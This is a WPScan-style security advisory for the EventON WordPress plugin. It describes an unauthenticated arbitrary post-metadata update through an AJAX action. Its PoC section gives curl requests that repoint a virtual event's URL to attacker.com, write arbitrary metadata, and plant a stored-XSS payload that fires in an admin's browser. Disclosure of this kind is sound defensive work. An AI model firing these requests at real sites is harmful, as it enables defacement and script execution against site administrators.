Lucene search

K
wpvulndbErwan LR (WPScan)WPVDB-ID:774655AC-B201-4D9F-8790-9EFF8564BC91
HistoryJan 10, 2024 - 12:00 a.m.

EventON (Free < 2.2.8, Premium < 4.5.6) - Unauthenticated Arbitrary Post Metadata Update

2024-01-1000:00:00
Erwan LR (WPScan)
wpscan.com
9
eventon
arbitrary post metadata
unauthenticated update
stored xss
ajax action
sanitisation

0.001 Low

EPSS

Percentile

20.5%

Description The plugins do not have authorisation in an AJAX action, and does not ensure that the post to be updated belong to the plugin, allowing unauthenticated users to update arbitrary post metadata. Note: Such issue could lead to Unauthenticated Stored XSS due to the lack of sanitisation in the Free plugin before 2.7.7 and Premium before 4.5.5

PoC

To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240: curl -X POST --data “eid=240&values;[_vir_url]=https://attacker.com/” ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta’ To set the my_meta metadata (if it does not exist, it will be created as a custom field) to attacker on the post with ID 20: curl -X POST --data “eid=20&values;[my_meta]=attacker” ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta’ This can lead to Stored XSS in Free < 2.7.7 and Premium <= 4.5.4 curl -X POST --data ‘eid=240&values;[_evcal_ec_f1a1_cus]=" style=animation-name:rotation onanimationstart=alert(/XSS/)//’ ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta’ The XSS will be triggered when an admin will edit the event in the backend

CPENameOperatorVersion
eq4.5.6
eq2.2.8

0.001 Low

EPSS

Percentile

20.5%

Related for WPVDB-ID:774655AC-B201-4D9F-8790-9EFF8564BC91